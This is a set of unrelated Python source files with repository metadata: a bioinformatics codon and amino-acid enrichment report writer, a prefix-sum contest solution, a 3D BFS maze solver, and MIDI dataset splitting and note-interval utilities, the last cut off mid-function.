:param p_value_corrected: (float) the corrected p_value (fdr method)
:return: (2 strings) : regulation that can be equal to "=" if the pvalue is <0.05 or "+" or "-" if the pvalue is
<0.05. The choice of the regulation if done thanks to the confidence interval that contains 90% of the frequency of
the codon/amino acid/nature of interest 'ic_90'
"""
regulation = " = "
regulation_fdr = " = "
if p_value <= 0.05:
if user_frequency < ic_90[0]:
regulation = "-"
else:
regulation = "+"
if p_value_corrected <= 0.05:
if user_frequency < ic_90[0]:
regulation_fdr = "-"
else:
regulation_fdr = "+"
return regulation, regulation_fdr
def calculate_ic_90(control_frequencies):
"""
:param control_frequencies: frequencies of the control sets
:return: the interval containing 90% of the frequencies for a given codon (there are as much as frequencies for a
codon than the number of control sets)
"""
ic_90 = dict()
for codon_or_amino_acid_or_nature in control_frequencies:
control_frequencies[codon_or_amino_acid_or_nature].sort()
ic_90[codon_or_amino_acid_or_nature] = list()
ic_90[codon_or_amino_acid_or_nature].append(control_frequencies[codon_or_amino_acid_or_nature][int(
len(control_frequencies[codon_or_amino_acid_or_nature]) * 0.05)])
ic_90[codon_or_amino_acid_or_nature].append(control_frequencies[codon_or_amino_acid_or_nature][int(
len(control_frequencies[codon_or_amino_acid_or_nature]) * 0.95)])
return ic_90
def get_content_codon_enrichment(control_frequencies, interest_frequencies, interest_frequencies_5p, interest_frequencies_3p, dic_p_val, set_number):
"""
:param control_frequencies: (dictionary of float) a dictionary containing the codon frequencies of the control sets
:param interest_frequencies: (dictionary of float) a dictionary frequency of each codon in the user set of exons
:param dic_p_val: (dic of floats) a dictionary containing the p_values
:param set_number: (int) the number of set to create
:return: (list of list of strings) the content of the codon sheet
"""
codon_list = ["TAG" , "TAA" , "TGA", "GCA" , "GCC" , "GCG" , "GCT" , "TGT" , "TGC" , "GAT" , "GAC" , "GAA" ,
"GAG" , "TTC" , "TTT" , "GGT" , "GGG" , "GGA" , "GGC" , "CAT" , "CAC" , "ATC" , "ATA" , "ATT" ,
"AAG" , "AAA" , "CTG" , "CTA" , "CTC" , "CTT" , "TTG" , "TTA" , "ATG" , "AAC" , "AAT" , "CCT" ,
"CCG" , "CCA" , "CCC" , "CAA" , "CAG" , "AGG" , "AGA" , "CGA" , "CGC" , "CGG" , "CGT" , "AGC" ,
"AGT" , "TCG" , "TCC" , "TCA" , "TCT" , "ACC" , "ACA" , "ACG" , "ACT" , "GTA" , "GTC" , "GTG" ,
"GTT" , "TGG" , "TAT" , "TAC"]
dic_padjust = {}
content = [["codon", "tRNA", "amino_acid", "frequencies_of_the_interest_set", "frequencies_interest_set_5p", "frequencies_interest_set_3p",
"average_frequencies_of_the_"+str(set_number)+"_sets", "IC_90_of_the_"+str(set_number)+"_sets",
"p_values_like", "FDR", "regulation_(p<=0.05)", "regulation(fdr<=0.05)", "codon_info"]]
ic_90 = calculate_ic_90(control_frequencies)
p_vals = list()
for codon in codon_list:
p_vals.append(dic_p_val[codon])
rstats = importr('stats')
p_adjust = rstats.p_adjust(FloatVector(p_vals), method="BH")
i = 0
for codon in codon_list:
if codon2rare[codon] == "+":
info_codon = "Frequent"
elif codon2rare[codon] == "-":
info_codon = "Rare"
else:
info_codon = ""
regulation, regulation_fdr = check_regulation(interest_frequencies[codon], ic_90[codon], dic_p_val[codon],
p_adjust[i])
content.append([str(codon), str(codon2anticodon[codon]), str(codon2aminoAcid[codon]),
str(interest_frequencies[codon]), str(interest_frequencies_5p[codon]), str(interest_frequencies_3p[codon]), str(np.mean(control_frequencies[codon])),
str(ic_90[codon]), str(dic_p_val[codon]), str(p_adjust[i]), str(regulation),
str(regulation_fdr), str(info_codon)])
dic_padjust[codon] = p_adjust[i]
i += 1
return content, dic_padjust
def get_content_amino_acid_enrichment(control_frequencies, interest_frequencies, interest_frequencies_5p, interest_frequencies_3p, dic_p_val, set_number):
"""
:param control_frequencies: (dictionary of floats) a dictionary containing the amino acid frequencies of the control
sets
:param interest_frequencies: (dictionary of floats) a dictionary frequency of each amino acid in the user set of
exons
:param dic_p_val: (dictionary of floats) a dictionary containing the p_values
:param set_number: (int) the number of set to create
:return: (list of list of strings) the content of the amino_acid sheet ! Each sublist correspond to a row in the
amino_acid sheet of the enrichment_report.xlsx file
"""
dic_padjust = {}
content = [["amino_acid", "frequencies_of_the_interest_set", "frequencies_interest_set_5p", "frequencies_interest_set_3p",
"average_frequencies_of_the_"+str(set_number)+"_sets",
"IC_90_of_the_"+str(set_number)+"_sets", "p_values_like", "FDR", "regulation_(p<=0.05)",
"regulation(fdr<=0.05)"]]
ic_90 = calculate_ic_90(control_frequencies)
p_vals = list()
for amino_acid in sorted(dic_p_val.keys()):
p_vals.append(dic_p_val[amino_acid])
rstats = importr('stats')
p_adjust = rstats.p_adjust(FloatVector(p_vals), method="BH")
i = 0
for amino_acid in sorted(dic_p_val.keys()):
regulation, regulation_fdr = check_regulation(interest_frequencies[amino_acid], ic_90[amino_acid],
dic_p_val[amino_acid], p_adjust[i])
content.append([str(amino_acid), str(interest_frequencies[amino_acid]), str(interest_frequencies_5p[amino_acid]), str(interest_frequencies_3p[amino_acid]),
str(np.mean(control_frequencies[amino_acid])), str(ic_90[amino_acid]),
str(dic_p_val[amino_acid]), str(p_adjust[i]), str(regulation), str(regulation_fdr)])
dic_padjust[amino_acid] = p_adjust[i]
i += 1
return content, dic_padjust
def get_content_group_enrichment(control_frequencies, interest_frequencies, interest_frequencies_5p, interest_frequencies_3p, dic_p_val, set_number, name, list_key=None):
"""
:param control_frequencies: (dictionary of floats) a dictionary containing the amino acid nature frequencies of the
control sets
:param interest_frequencies: (dictionary of floats) a dictionary frequency of each amino acid nature in the user set
of exons
:param dic_p_val: (dictionary of floats a dictionary containing the p_values
:param set_number: (int) the number of set to create
:param name: (string) : the name of the first column
:param list_key: (list of string) list of key contained in control_frequencies, interest_frequencies, dic_p_val
:return: (list of list of strings) the content of the nature sheet ! Each sublist correspond to a row in the
nature sheet of the enrichment_report.xlsx file
"""
dic_padjust = {}
content = [[name, "frequencies_of_the_interest_set", "frequencies_interest_set_5p", "frequencies_interest_set_3p",
"average_frequencies_of_the_"+str(set_number)+"_sets", "IC_90_of_the_"+str(set_number)+"_sets",
"p_values_like", "FDR", "regulation_(p<=0.05)", "regulation(fdr<=0.05)"]]
ic_90 = calculate_ic_90(control_frequencies)
p_vals = list()
for nature in dic_p_val.keys():
p_vals.append(dic_p_val[nature])
rstats = importr('stats')
p_adjust = list(rstats.p_adjust(FloatVector(p_vals), method="BH"))
padjust = {}
i=0
for nature in dic_p_val.keys():
padjust[nature] = p_adjust[i]
i += 1
if list_key is None:
for nature in dic_p_val.keys():
regulation, regulation_fdr = check_regulation(interest_frequencies[nature], ic_90[nature],
dic_p_val[nature], padjust[nature])
content.append([str(nature), str(interest_frequencies[nature]), str(interest_frequencies_5p[nature]), str(interest_frequencies_3p[nature]),
str(np.mean(control_frequencies[nature])), str(ic_90[nature]), str(dic_p_val[nature]),
str(padjust[nature]), str(regulation), str(regulation_fdr)])
else:
for nature in list_key:
if nature == " ":
content.append([" " for i in range(7)])
else:
regulation, regulation_fdr = check_regulation(interest_frequencies[nature], ic_90[nature], dic_p_val[nature], padjust[nature])
content.append([str(nature), str(interest_frequencies[nature]), str(interest_frequencies_5p[nature]), str(interest_frequencies_3p[nature]),
str(np.mean(control_frequencies[nature])), str(ic_90[nature]), str(dic_p_val[nature]),
str(padjust[nature]), str(regulation), str(regulation_fdr)])
return content, dic_padjust
def create_iupac_dic(dic):
"""
:param dic: (dictionary of float) must have the following keys : A, T, G, C
:return: a dictionary with ambiguous iupac nt
"""
res_iupac = {}
res_iupac["Y"] = dic["C"] + dic["T"]
res_iupac["R"] = dic["A"] + dic["G"]
res_iupac["W"] = dic["T"] + dic["A"]
res_iupac["S"] = dic["C"] + dic["G"]
res_iupac["K"] = dic["T"] + dic["G"]
res_iupac["M"] = dic["A"] + dic["C"]
return res_iupac
def sorted_string(a_dic, nt_string=None):
"""
:param a_dic: (dictionary of float) - the key of the dictionary are nucleotides and their associated value their
frequencies in a sequence of interest
:param nt_string: (string) sequence of nucleotides that corresponds to frequencies in "a_dic" dictionary
:return: (list of tuple) ordered by the float value in the dictionary
"""
res_str = ""
res_prop = ""
list_tuple = sorted(a_dic.items(), key=lambda x: x[1], reverse=True)
for my_tuple in list_tuple:
res_str += str(my_tuple[0]) + "(" + str(my_tuple[1]) + ")" + " - "
if nt_string is not None:
res_prop += str(my_tuple[0]) + "(" + str(round(float(my_tuple[1] * 100) / len(nt_string), 1)) + ")" + " - "
res_str = res_str[:len(res_str)-3]
if nt_string is not None:
res_prop = res_prop[:len(res_prop) - 3]
return res_str, res_prop
return res_str
def get_group_nt_info(list_aa):
"""
:param list_aa: (list of string) list of amino acid
:return: the number of nt in all the codon coded by all the amino acid in the list, their proportion and their
pondered proportion
example : list_aa = K, W
codon list = AAA, AAG, TGG:
count_str = A(5) - G(3) - T(1) - C(0) - Y(1) - R(8) - S(3) - W(6) - K(4) - M(5) -D....
count_prop = A(55.6) - G(33.3) - ....
count_pond = A((5./6 + 0./3) * 100 /2 = 41.6) - G(41.6)
"""
res = {"A":0, "T":0, "G":0, "C":0}
ponderate = {"A":0., "T":0., "G":0., "C":0.}
curstr = ""
for aa in list_aa:
cur_codon = amino_acid2codon[aa].replace(",","")
for nt in ponderate.keys():
ponderate[nt] += float(cur_codon.count(nt)) / len(cur_codon)
curstr += cur_codon
for nt in ponderate.keys():
ponderate[nt] = round(ponderate[nt] * 100 / len(list_aa), 1)
count_pond = sorted_string(ponderate)
for key in res.keys():
res[key] = curstr.count(key)
count_str, count_prop = sorted_string(res, curstr)
res_iupac = create_iupac_dic(res)
pond_iupac = create_iupac_dic(ponderate)
count_str_iupac, count_prop_iupac = sorted_string(res_iupac, curstr)
count_pond_iupac = sorted_string(pond_iupac)
count_str = count_str + " - " + count_str_iupac
count_prop = count_prop + " - " + count_prop_iupac
count_pond = str(count_pond) + " - " + str(count_pond_iupac)
return count_str, count_prop, count_pond
def get_content_group_enrichment2(control_frequencies, interest_frequencies, interest_frequencies_5p, interest_frequencies_3p, dic_p_val, set_number, name, reg_dic):
"""
:param control_frequencies: (dictionary of floats) a dictionary containing the amino acid nature frequencies of the
control sets
:param interest_frequencies: (dictionary of floats) a dictionary frequency of each amino acid nature in the user set
of exons
:param dic_p_val: (dictionary of floats a dictionary containing the p_values
:param set_number: (int) the number of set to create
:param name: (string) : the name of the first column
:param reg_dic: (dictionary of list of string) : dictionary having keys corresponding to the group of interest and
a list associated to those keys corresponding to the amino acid aggregated in those groups
:return: (list of list of strings) the content of the nature sheet ! Each sublist correspond to a row in the
nature sheet of the enrichment_report.xlsx file
"""
dic_padjust = {}
content = [[name, "frequencies_of_the_interest_set", "frequencies_interest_set_5p", "frequencies_interest_set_3p",
"average_frequencies_of_the_"+str(set_number)+"_sets", "IC_90_of_the_"+str(set_number)+"_sets",
"p_values_like", "FDR", "regulation_(p<=0.05)", "regulation(fdr<=0.05)", "nb_nt_group", "prop_nt_group", "ponderate_nt_group"]]
ic_90 = calculate_ic_90(control_frequencies)
p_vals = list()
for nature in dic_p_val.keys():
p_vals.append(dic_p_val[nature])
rstats = importr('stats')
p_adjust = rstats.p_adjust(FloatVector(p_vals), method="BH")
i = 0
for nature in dic_p_val.keys():
info_count, info_prop, count_pond = get_group_nt_info(reg_dic[nature])
regulation, regulation_fdr = check_regulation(interest_frequencies[nature], ic_90[nature],
dic_p_val[nature], p_adjust[i])
content.append([str(nature), str(interest_frequencies[nature]), str(interest_frequencies_5p[nature]), str(interest_frequencies_3p[nature]),
str(np.mean(control_frequencies[nature])), str(ic_90[nature]), str(dic_p_val[nature]),
str(p_adjust[i]), str(regulation), str(regulation_fdr), str(info_count), str(info_prop), str(count_pond)])
dic_padjust[nature] = p_adjust[i]
i += 1
return content, dic_padjust
def writing_enrichment_report_file(control_frequencies_codon, codon_frequencies, codon_frequencies_5p, codon_frequencies_3p, dic_p_val_codon,
control_frequencies_aa, aa_frequencies, aa_frequencies_5p, aa_frequencies_3p, dic_p_val_aa,
control_ft_frequencies, ft_frequency, ft_frequency_5p, ft_frequency_3p, dic_p_val_ft,
control_ftr_frequencies, ftr_frequency, ftr_frequency_5p, ftr_frequency_3p, dic_p_val_ftr,
control_ftor_frequencies, ftor_frequency, ftor_frequency_5p, ftor_frequency_3p, dic_p_val_ftor,
control_nucleic_acid_frequencies, nucleic_acid_frequency, nucleic_acid_frequency_5p, nucleic_acid_frequency_3p, dic_p_val_nt,
control_ntp_frequencies, ntp_frequency, ntp_frequency_5p, ntp_frequency_3p, dic_p_val_ntp,
control_dnt_frequencies, dnt_frequency, dnt_frequency_5p, dnt_frequency_3p, dic_p_val_dnt,
control_hexa_frequencies, hexa_frequency, hexa_frequency_5p, hexa_frequency_3p, dic_p_val_hexa,
control_diaa_frequencies, diaa_frequency, diaa_frequency_5p, diaa_frequency_3p, dic_p_val_diaa,
output_folder, set_number):
workbook = xlsxwriter.Workbook(output_folder + "enrichment_report.xlsx")
# setting the formats
header_format = workbook.add_format({'bg_color': '#00DCFF', 'align': 'center', 'valign': 'vcenter', 'border': True})
normal_format = workbook.add_format({'align': 'center', 'valign': 'vcenter', 'border': True})
# getting the sheet content
codon_content, dic_padjust_codon = get_content_codon_enrichment(control_frequencies_codon,
codon_frequencies, codon_frequencies_5p, codon_frequencies_3p, dic_p_val_codon,
set_number)
aa_content, dic_padjust_aa = get_content_amino_acid_enrichment(control_frequencies_aa, aa_frequencies, aa_frequencies_5p, aa_frequencies_3p,
dic_p_val_aa, set_number)
ft_list = ["Very-small", "Small#2", "Large", "Disorder-promoting#1", "Order-promoting#1", "Disorder-promoting#2",
"Order-promoting#2", "Polar-uncharged#1", "Polar-uncharged#2", "Charged#1", "Charged#2", "Hydrophilic#1",
"Hydrophobic#1", "Neutral", "Hydroxylic", "Negatively-charged", "Positively-charged#1",
"Positively-charged#2"]
ft_content, dic_padjust_ft = get_content_group_enrichment(control_ft_frequencies,
ft_frequency,
ft_frequency_5p,
ft_frequency_3p,
dic_p_val_ft,
set_number, "feature", ft_list)
ftr_list = ["Very-small/(Very-small+Large)", "Large/(Very-small+Large)", "Small#2/(Small#2+Large)",
"Large/(Small#2+Large)", "Disorder#1/(Disorder#1+Order#1)", "Order#1/(Disorder#1+Order#1)",
"Disorder#2/(Disorder#2+Order#2)", "Order#2/(Disorder#2+Order#2)", "Uncharged#1/(Uncharged#1+Charged#1)",
"Charged#1/(Uncharged#1+Charged#1)", "Uncharged#2/(Uncharged#2+Charged#1)",
"Charged#1/(Uncharged#2+Charged#1)", "Uncharged#2/(Uncharged#2+Charged#2)",
"Charged#2/(Uncharged#2+Charged#2)", "Neutral/(Neutral+Charged#2)", "Charged#2/(Neutral+Charged#2)",
"Hydrophilic#1/(Hydrophilic#1+Hydrophobic#1)", "Hydrophobic#1/(Hydrophilic#1+Hydrophobic#1)",
"Hydroxylic/(Hydroxylic+Negatively-charged)", "Negatively-charged/(Hydroxylic+Negatively-charged)",
"Negatively-charged/(Positively-charged#1+Negatively-charged)",
"Positively-charged#1/(Positively-charged#1+Negatively-charged)",
"Negatively-charged/(Positively-charged#2+Negatively-charged)",
"Positively-charged#2/(Positively-charged#2+Negatively-charged)"]
ftr_content, dic_padjust_ftr = get_content_group_enrichment(control_ftr_frequencies,
ftr_frequency,
ftr_frequency_5p,
ftr_frequency_3p,
dic_p_val_ftr,
set_number, "feature_ratio", ftr_list)
ftor_list = ["Very-small/Large", "Small#2/Large", "Disorder#1/Order#1", "Disorder#2/Order#2", "Polar-uncharged#1/Charged#1",
"Polar-uncharged#2/Charged#1", "Polar-uncharged#1/Charged#2", "Polar-uncharged#2/Charged#2",
"Neutral/Charged#2", "Hydrophilic#1/Hydrophobic#1", "Hydroxylic/Negatively-charged",
"Negatively-charged/Positively-charged#1", "Negatively-charged/Positively-charged#2"]
ftor_content, dic_padjust_ftor = get_content_group_enrichment(control_ftor_frequencies,
ftor_frequency,
ftor_frequency_5p,
ftor_frequency_3p,
dic_p_val_ftor,
set_number, "opposed_feature_ratio", ftor_list)
nt_list = ["A", "G", "C", "T", " ", "Y", "R", " ", "S", "W", " ", "K", "M", " ", "D", "C", " ", "V", "T", " ", "H", "G", " ",
"B", "A"]
nt_content, dic_padjust_nt = get_content_group_enrichment(control_nucleic_acid_frequencies,
nucleic_acid_frequency,
nucleic_acid_frequency_5p,
nucleic_acid_frequency_3p,
dic_p_val_nt,
set_number, "nt_info", nt_list)
ntp_list = ["A1", "A1n2", "A2", "A3", "C1", "C1n2", "C2", "C3", "G1", "G1n2", "G2", "G3", "T1", "T1n2", "T2", "T3",
"Y1", "Y2", "Y3", "R1", "R2", "R3", "S1", "S1n2", "S2", "S3", "W1", "W1n2", "W2", "W3", "K1", "K1n2", "K2", "K3", "M1", "M1n2", "M2", "M3",
"D1", "D2", "D3", "V1", "V2", "V3", "H1", "H2", "H3", "B1", "B2", "B3"]
ntp_content, dic_padjust_ntp = get_content_group_enrichment(control_ntp_frequencies,
ntp_frequency,
ntp_frequency_5p,
ntp_frequency_3p,
dic_p_val_ntp,
set_number, "ntp_info", ntp_list)
iu = {"Y": ["C", "T"], "R": ["A", "G"], "W": ["A", "T"], "S": ["G", "C"], "K": ["T", "G"],
"M": ["C", "A"]}
dnt_list = []
for k1 in iu.keys():
for k2 in iu.keys():
dnt_list.append(k1 + k2)
dnt_list.append(iu[k1][0] + iu[k2][0])
dnt_list.append(iu[k1][0] + iu[k2][1])
dnt_list.append(iu[k1][1] + iu[k2][0])
dnt_list.append(iu[k1][1] + iu[k2][1])
dnt_list.append(" ")
dnt_content, dic_padjust_dnt = get_content_group_enrichment(control_dnt_frequencies,
dnt_frequency,
dnt_frequency_5p,
dnt_frequency_3p,
dic_p_val_dnt,
set_number, "dnt_info", dnt_list)
hexa_content, dic_padjust_hexa = get_content_group_enrichment(control_hexa_frequencies,
hexa_frequency,
hexa_frequency_5p,
hexa_frequency_3p,
dic_p_val_hexa,
set_number, "hexanucleotide")
diaa_content, dic_padjust_diaa = get_content_group_enrichment(control_diaa_frequencies,
diaa_frequency,
diaa_frequency_5p,
diaa_frequency_3p,
dic_p_val_diaa,
set_number, "di-aa")
# creating the sheets...
codon_sheet = workbook.add_worksheet("codon")
aa_sheet = workbook.add_worksheet("amino_acid")
ft_sheet = workbook.add_worksheet("feature")
ftr_sheet = workbook.add_worksheet("feature_ratio")
ftor = workbook.add_worksheet("opposed_feature_ratio")
nt_sheet = workbook.add_worksheet("nt_info")
ntp_sheet = workbook.add_worksheet("nt_pos_info")
dnt_sheet = workbook.add_worksheet("dnt_info")
hexa_sheet = workbook.add_worksheet("hexa_info")
diaa_sheet = workbook.add_worksheet("di-aa_info")
# filling the sheets...
sheet_filler(codon_content, codon_sheet, header_format, normal_format)
sheet_filler(aa_content, aa_sheet, header_format, normal_format)
sheet_filler(ft_content, ft_sheet, header_format, normal_format)
sheet_filler(ftr_content, ftr_sheet, header_format, normal_format)
sheet_filler(ftor_content, ftor, header_format, normal_format)
sheet_filler(nt_content, nt_sheet, header_format, normal_format)
sheet_filler(ntp_content, ntp_sheet, header_format, normal_format)
sheet_filler(dnt_content, dnt_sheet, header_format, normal_format)
sheet_filler(hexa_content, hexa_sheet, header_format, normal_format)
sheet_filler(diaa_content, diaa_sheet, header_format, normal_format)
workbook.close()
return dic_padjust_codon, dic_padjust_aa
| LBMC/Fontro_Aube_2019 | tRNA_program/enrichiment_report_maker.py | enrichiment_report_maker.py | py | 30,880 | python | en | code | 0 | github-code | 90 |
18189274109 | from bisect import bisect_right
N,M,K = map(int,input().split())
A = list(map(int,input().split()))
B = list(map(int,input().split()))
#a,bの累積和
A_sum = [0]
B_sum = [0]
for i in range(N):
A_sum.append(A_sum[i]+A[i])
for i in range(M):
B_sum.append(B_sum[i]+B[i])
ans = 0
#Aについて0-N冊読む場合の全探索
for i in range(N+1):
cntA = i #Aをi冊読む
rest = K - A_sum[i] #残り時間rest分
if rest < 0:
break
cntB = bisect_right(B_sum,rest)-1 #Bで読むことができる冊数を二分探索で求める
ans = max(ans,cntA + cntB)
print(ans) | Aasthaengg/IBMdataset | Python_codes/p02623/s942005296.py | s942005296.py | py | 601 | python | en | code | 0 | github-code | 90 |
19255700245 | from sys import stdin
from collections import deque
moving_dir = [[-1, 0, 0], [1, 0, 0], [0, -1, 0], [0, 1, 0], [0, 0, -1], [0, 0, 1]]
def bfs(building, floors, rows, cols, cur_row, cur_col, cur_floor):
queue = deque()
building[cur_floor][cur_row][cur_col] = "-"
queue.append([cur_row, cur_col, cur_floor])
distance = 0
while len(queue) != 0:
size = len(queue)
for _ in range(size):
cur_row, cur_col, cur_floor = queue.popleft()
if building[cur_floor][cur_row][cur_col] == 'E':
return distance
for moving_row, moving_col, moving_floor in moving_dir:
next_row = cur_row + moving_row
next_col = cur_col + moving_col
next_floor = cur_floor + moving_floor
if 0 <= next_row < rows and 0 <= next_col < cols and 0 <= next_floor < floors:
if building[next_floor][next_row][next_col] == '.' or \
building[next_floor][next_row][next_col] == 'E':
if building[next_floor][next_row][next_col] != 'E':
building[next_floor][next_row][next_col] = '_'
queue.append([next_row, next_col, next_floor])
distance += 1
return -1
def main():
stdin = open('./input.txt', 'r')
while True:
num_of_floors, rows, cols = map(int, stdin.readline().split())
if num_of_floors == 0 and rows == 0 and cols == 0:
break
building = []
for _ in range(num_of_floors):
floor = []
for _ in range(rows + 1):
row = list(stdin.readline().rstrip())
if len(row) != 0:
floor.append(row)
building.append(floor)
start_point = []
for floor in range(num_of_floors):
for row in range(rows):
for col in range(cols):
if building[floor][row][col] == 'S':
start_point.append(row)
start_point.append(col)
start_point.append(floor)
break
distance = bfs(building, num_of_floors, rows, cols, start_point[0], start_point[1], start_point[2])
if distance == -1:
print("Trapped!")
else:
print(f"Escaped in {distance} minute(s).")
if __name__ == '__main__':
main()
| ag502/algorithm | Problem/BOJ_6593_상범 빌딩/main.py | main.py | py | 2,456 | python | en | code | 1 | github-code | 90 |
13248935702 | from copy import deepcopy
s = 0
rules = dict()
my_ticket = []
nearby_tickets = []
with open('input.txt', 'r') as f:
for line in f:
l = line.replace('\n', ' ')
if s == 0:
if l.isspace():
s = 1
else:
splitted = l.split(': ')
vals = splitted[1].split(' or ')
rules[splitted[0]] = []
for v in vals:
in_val = v.split('-')
rules[splitted[0]] += list(range(int(in_val[0]), int(in_val[1]) + 1))
elif s == 1:
if l.isspace():
s = 2
elif not l.startswith('your'):
my_ticket = [int(n) for n in l.split(',')]
else:
if not l.startswith('nearby'):
nearby_tickets.append([int(n) for n in l.split(',')])
sum = 0
part2_nearby_tickets = nearby_tickets.copy()
for n in nearby_tickets:
for m in n:
if not any([m in rules[k] for k in rules]):
sum+=m
part2_nearby_tickets.remove(n)
print(sum)
part2_rules = dict()
for k in rules:
part2_rules[k] = []
i = 0
while(i < len(rules.keys())):
good = True
for m in part2_nearby_tickets:
good = good and (m[i] in rules[k])
if good:
part2_rules[k].append(i)
i+=1
sorted_part2_rules = {k: v for k, v in sorted(part2_rules.items(), key=lambda item: item[1], reverse=True)}
temp = deepcopy(sorted_part2_rules)
keys = list(temp.keys())
cannot_delete = []
while(keys):
k = keys.pop(0)
#print(k, temp[k], cannot_delete)
deletable_numbers = [x for x in temp[k] if x not in cannot_delete]
if len(temp[k]) == 1 and (temp[k][0] in cannot_delete):
removed_number = temp[k][0]
else:
removed_number = deletable_numbers[0]
for in_k in temp.keys():
if in_k != k and removed_number in temp[in_k]:
temp[in_k].remove(removed_number)
if not all([len(temp[t]) > 0 for t in temp]):
temp = deepcopy(sorted_part2_rules)
keys = list(temp.keys())
cannot_delete.append(removed_number)
ans = 1
for k in temp:
if k.startswith('departure'):
k_i = temp[k][0]
ans *= my_ticket[k_i]
print(ans) | kovapatrik/advent-of-code-2020 | day16/task16.py | task16.py | py | 2,268 | python | en | code | 0 | github-code | 90 |
39063706388 | from counters.count import add, sub, mul
import secondary
def hello():
name = input("What is your name: ")
print("Hello", name)
def main():
hello()
x = secondary.foo(1)
print(x)
print(add(3, 4))
print(sub(3, 4))
print(multiply(3, 4))
if __name__== "__main__":
main()
| WilliamPyke/vigilant-fortnight | main.py | main.py | py | 306 | python | en | code | 0 | github-code | 90 |
12417112382 | from random import shuffle
import os
import pretty_midi as pm
import numpy as np
import mir_eval.transcription
def safe_mkdir(dir,clean=False):
if not os.path.exists(dir):
os.makedirs(dir)
if clean and not os.listdir(dir) == [] :
old_path = os.path.join(dir,"old")
safe_mkdir(old_path)
for fn in os.listdir(dir):
full_path = os.path.join(dir,fn)
if not os.path.isdir(full_path):
os.rename(full_path,os.path.join(old_path,fn))
def move_files(file_list,folder1,folder2):
for midi_file in file_list:
os.rename(os.path.join(folder1,midi_file), os.path.join(folder2,midi_file))
def split_files(folder,test=0.2,valid=0.1):
midi_list = [x for x in os.listdir(folder) if x.endswith('.mid')]
train_path = os.path.join(folder,"train/")
valid_path = os.path.join(folder,"valid/")
test_path = os.path.join(folder,"test/")
safe_mkdir(train_path)
safe_mkdir(valid_path)
safe_mkdir(test_path)
N = len(midi_list)
N_test = int(N*test)
N_valid = int(N*valid)
shuffle(midi_list)
test_list, valid_list, train_list = midi_list[:N_test], midi_list[N_test:N_test+N_valid],midi_list[N_test+N_valid:]
move_files(test_list,folder,test_path)
move_files(valid_list,folder,valid_path)
move_files(train_list,folder,train_path)
def unsplit_files(folder):
train_path = os.path.join(folder,"train/")
valid_path = os.path.join(folder,"valid/")
test_path = os.path.join(folder,"test/")
move_files(os.listdir(train_path),train_path,folder)
move_files(os.listdir(valid_path),valid_path,folder)
move_files(os.listdir(test_path),test_path,folder)
os.rmdir(train_path)
os.rmdir(test_path)
os.rmdir(valid_path)
def write_namelist_as_pickle(folder):
#Only used once, to make sure the local and distant datasets are the same
def get_name_list(subfolder):
namelist = []
for fn in os.listdir(subfolder):
if fn.endswith('.mid'):
namelist += [fn]
return namelist
train_path = os.path.join(folder,'train')
valid_path = os.path.join(folder,'valid')
test_path = os.path.join(folder,'test')
namelist = {'train': get_name_list(train_path),
'valid':get_name_list(valid_path),
'test':get_name_list(test_path)}
import pickle as pickle
pickle.dump(namelist, open(os.path.join(folder,'namelist.p'), "wb"))
def split_files_with_namelist(folder):
#Only used once, to make sure the local and distant datasets are the same
import pickle as pickle
namelist = pickle.load(open(os.path.join(folder,'namelist.p'), "rb"))
train_list = namelist['train']
valid_list = namelist['valid']
test_list = namelist['test']
train_path = os.path.join(folder,'train')
valid_path = os.path.join(folder,'valid')
test_path = os.path.join(folder,'test')
safe_mkdir(train_path)
safe_mkdir(valid_path)
safe_mkdir(test_path)
move_files(test_list,folder,test_path)
move_files(valid_list,folder,valid_path)
move_files(train_list,folder,train_path)
def get_chord_counter(subfolder):
from collections import Counter
midi_list = [x for x in os.listdir(subfolder) if x.endswith('.mid')]
chord_list = []
for midi in midi_list:
chords = midi.split("_")
suffix = chords.pop()
if suffix == "0.mid" or len(chords) == 1:
chords = [chords[0],chords[0],chords[0]]
elif suffix == "01.mid":
chords = [chords[0],chords[1],chords[1]]
elif suffix == "02.mid":
chords = [chords[0],chords[0],chords[1]]
chord_list += chords
counter = Counter(chord_list)
return sorted(counter.items())
def get_chord_counter_by_position(subfolder):
from collections import Counter
midi_list = [x for x in os.listdir(subfolder) if x.endswith('.mid')]
chord_list = []
for midi in midi_list:
chords = midi.split("_")
suffix = chords.pop()
if suffix == "0.mid" or len(chords) == 1:
chords = [chords[0],chords[0],chords[0]]
elif suffix == "01.mid":
chords = [chords[0],chords[1],chords[1]]
elif suffix == "02.mid":
chords = [chords[0],chords[0],chords[1]]
elif suffix == "012.mid":
print(chords)
chord_list += [chords]
def count_position(i):
count_list = []
for chord in chord_list:
count_list += [chord[i]]
return Counter(count_list)
counter0 = count_position(0)
counter1 = count_position(1)
counter2 = count_position(2)
return sorted(counter0.items()),sorted(counter1.items()),sorted(counter2.items())
def my_get_end_time(midi_data):
instruments = midi_data.instruments
events = []
for instr in instruments:
events += [n.end for n in instr.notes]
# If there are no events, just return 0
if len(events) == 0:
return 0.
else:
return max(events)
def check_corrupt(subfolder):
midi_list = [os.path.join(subfolder,x) for x in os.listdir(subfolder) if x.endswith('.mid')]
for midi_file in midi_list:
midi = pm.PrettyMIDI(midi_file)
piano_roll = midi.get_piano_roll()
len1 = piano_roll.shape[1]/100
len2 = my_get_end_time(midi)
if abs(len1-len2) > 1:
print(midi_file+", len1 = "+str(len1)+", len2 = "+str(len2))
def filter_short_notes(data,thresh=1):
#thresh is in number of steps
data_extended = np.pad(data,((0,0),(0,0),(1,1)),'constant')
diff = data_extended[:,:,1:] - data_extended[:,:,:-1]
onsets= np.where(diff==1)
offsets= np.where(diff==-1)
mask = offsets[2]-onsets[2]>thresh
onsets_filt = (onsets[0][mask],onsets[1][mask],onsets[2][mask])
offsets_filt = (offsets[0][mask],offsets[1][mask],offsets[2][mask])
diff_filtered=np.zeros(data_extended.shape)
diff_filtered[onsets_filt]=1
diff_filtered[offsets_filt]=-1
return np.cumsum(diff_filtered,axis=2)[:,:,:-2].astype(int)
def get_notes_intervals(data,fs):
data_extended = np.pad(data,((0,0),(1,1)),'constant')
diff = data_extended[:,1:] - data_extended[:,:-1]
onsets= np.where(diff==1)
offsets= np.where(diff==-1)
assert onsets[0].shape == offsets[0].shape
assert onsets[1].shape == offsets[1].shape
pitches = []
intervals = []
for [pitch1,onset], [pitch2,offset] in zip(list(zip(onsets[0],onsets[1])),list(zip(offsets[0],offsets[1]))):
# print pitch1, pitch2
# print onset, offset
assert pitch1 == pitch2
pitches += [pitch1+1]
intervals += [[onset/float(fs), offset/float(fs)]]
# print pitches
# print intervals
return np.array(pitches), np.array(intervals)
def TP(data,target):
